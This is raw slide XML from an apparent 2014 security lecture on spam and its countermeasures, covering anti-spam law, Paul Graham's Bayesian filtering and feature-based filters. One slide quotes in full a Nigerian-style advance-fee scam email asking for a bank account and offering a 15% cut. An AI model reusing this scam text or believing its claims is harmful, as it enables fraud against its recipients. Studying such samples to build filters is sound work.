              <a:t> economic capital of Ivory Coast before he was poisoned to death by his business associates on one of their outing to discus on a business deal. When my mother died on the 21st October 1984, my father took me and my younger brother HASSAN special because we are motherless. Before the death of my father on 30th June 2002 in a private hospital here in Abidjan. He secretly called me on his bedside and told me that he has a sum of $12.500.000 (Twelve Million, five hundred thousand dollars) left in a suspense account in a local Bank here in Abidjan, that he used my name as his first Daughter for the next of kin in deposit of the fund. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>He also explained to me that it was because of this wealth and some huge amount of money his business associates supposed to balance his from the deal they had that he was poisoned by his business associates, that I should seek for a God fearing foreign partner in a country of my choice where I will transfer this money and use it for investment purpose, (such as real estate management). Sir, we are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>honourably</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> seeking your assistance in the following ways.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1) To provide a Bank account where this money would be transferred to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2) To serve as the guardian of this since I am a girl of 26 years.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Moreover Sir, we are willing to offer you 15% of the sum as compensation for effort input after the successful transfer of this fund to your designate account overseas. please feel free to contact ,me via this email address </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>wumi1000abdul@yahoo.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Anticipating to hear from you soon. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Thanks and God Bless. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Best regards. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Miss </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Wumi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Abdul </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PLEASE FOR PRIVATE AND SECURITY REASONS,REPLY ME VIA EMAIL: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>wumi1000abdul@yahoo.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16782938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2" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fighting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>spam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="361950"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE541A8-D53F-3F4B-99AF-9027B68691FD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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Stopping spam</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Anti-spam laws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Legislation to restrict use of email spam in several countries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>“Legal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>definitions of spam, influenced presumably by lobbyists, tend to exclude mail sent by companies that have an "existing relationship" with the recipient. But buying something from a company, for example, does not imply that you have solicited ongoing email from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>them” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>– Paul Graham</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protection via a technical solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Filters</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>“I think it’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>possible to stop spam, and that content-based filters are the way to do it. The Achilles heel of the spammers is their message. They can circumvent any other barrier you set up. They have so far, at least. But they have to deliver their message, whatever it is. If we can write software that recognizes their messages, there is no way they can get around </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>that”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>– Paul </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Graham, 2002</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Black/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>white/grey lists</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1AE541A8-D53F-3F4B-99AF-9027B68691FD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32730999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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Filters</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325635" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Feature-recognizing filters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rules </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>recognize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>individual properties of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>E.g. mentions “Viagra”, has all uppercase subject, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assign a spam “score” to email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How many points should an email get for having the word </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“drug” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in it?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Statistical filtering based on the Bayesian approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Proposed by Paul Graham </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in 2002 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.paulgraham.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>spam.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trained on user’s email labeled as spam vs. not spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assigns each message with a probability of being spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Filters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are not perfect and can not prevent false positives or false </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>negatives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C552CEC0-AED0-2F49-9640-AB52F23ECF62}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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for today</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lecture 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3200400" y="1981200"/>
            <a:ext cx="695325" cy="419100"/>
            <a:chOff x="6143624" y="2514600"/>
            <a:chExt cx="695325" cy="419100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Right Arrow 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000">
              <a:off x="6143624" y="2514600"/>
              <a:ext cx="695325" cy="419100"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:ln w="19050"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11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6315838" y="2611083"/>
              <a:ext cx="491553" cy="246221"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                  <a:latin typeface="Tahoma"/>
                  <a:cs typeface="Tahoma"/>
                </a:rPr>
                <a:t>NEXT</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Date Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28 Jan 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Footer Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Marco Canini, © 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Slide Number Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
